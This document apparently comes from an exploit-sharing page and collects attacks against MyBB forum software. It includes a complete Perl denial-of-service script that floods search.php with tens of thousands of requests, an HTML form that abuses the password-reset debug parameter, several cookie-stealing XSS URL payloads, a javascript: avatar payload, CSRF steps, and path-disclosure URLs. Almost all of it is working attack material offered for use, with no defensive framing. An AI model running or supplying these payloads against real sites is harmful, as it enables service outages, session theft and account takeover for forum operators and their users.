MyBB Hot Editor Plugin Local File Inclusion (keyboard.php)
MyBB Search Denial of Service:
Code:
#!/usr/bin/perl
#####################################
# MyBB Search Denial of Service
# Code Written By ZoL64R
# KamikaZ Security Team
# ISRAEL
#####################################
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
if(!$ARGV[1])
{
print "#################################################\n";
print "## MyBB Search Denial of Service\n";
print "## Discoverd By ZoL64R.\n";
print "#################################################\n";
print "## [host] [path] \n";
print "## host.com /mybb\n";
print "#################################################\n";
exit();
}
for($i=0; $i<99999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "action=do_search&keywords=KamikaZ-Team&postthread=1&author=&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sorder=desc&showresults=threads&submit=Search";
$pack.= "POST " .$path. "/search.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "+";
}
MyBB Change Password Vulnerability
Code:
<form action="http://website/mybb_dir/member.php?debug=1" method="post">
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tr>
<td class="trow1" width="40%"><strong>Email Address:</strong></td>
<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
</tr>
<tr><td align="center">
<input type="hidden" name="action" value="do_lostpw" />
<input type="submit" class="button" value="Enter Here" />
</td></tr>
</table>
</form>
Cross-site scripting vulnerabilities:
http://target/mybb/archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>
1.2
inc/generic_error.php?message=<script>alert(document.cookie);</script>
inc/generic_error.php?message=1&code=<script>alert(document.cookie);</script>
1.1.7
/admin/index.php/”><script>alert(1)</script>
Cross-Site Request Forgery and Cross-Site Scripting (private.php)
Code:
First of all, the user must be REGISTERED and authorized
- Go to http://target/mybbpath/private.php
- Insert your XSS code for Subject
'Avatar URL' XSS Vulnerability
Code:
javascript:alert(123)
Full path disclosure:
inc/plugins/hello.php
inc/generic_error.php?message=1
inc/datahandlers/event.php
inc/datahandlers/pm.php
inc/datahandlers/post.php
inc/datahandlers/user.php
1.2.4
http://[TARGET]/[mybb-directory]/member.php?action[]=registe
http://[TARGET]/[mybb-directory]/inc/datahandlers/event.php
http://[TARGET]/[mybb-directory]/captcha.php?imagehash[]=123